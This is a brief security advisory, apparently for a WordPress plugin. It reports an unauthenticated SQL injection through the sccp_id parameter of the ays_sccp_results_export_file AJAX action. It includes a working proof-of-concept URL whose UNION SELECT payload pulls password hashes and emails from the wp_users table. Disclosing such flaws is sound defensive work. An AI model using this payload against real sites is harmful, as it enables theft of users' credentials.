The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an SQL injection.
https://example.com/wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp;_id[]=3)%20union%20select%201,user_pass,user_email,2,2,2%20from%20wp_users%20union%20select%201,1,1,1,1,1%20FROM%20wp_ays_sccp_reports%20WHERE%20(1=1%20&type;=json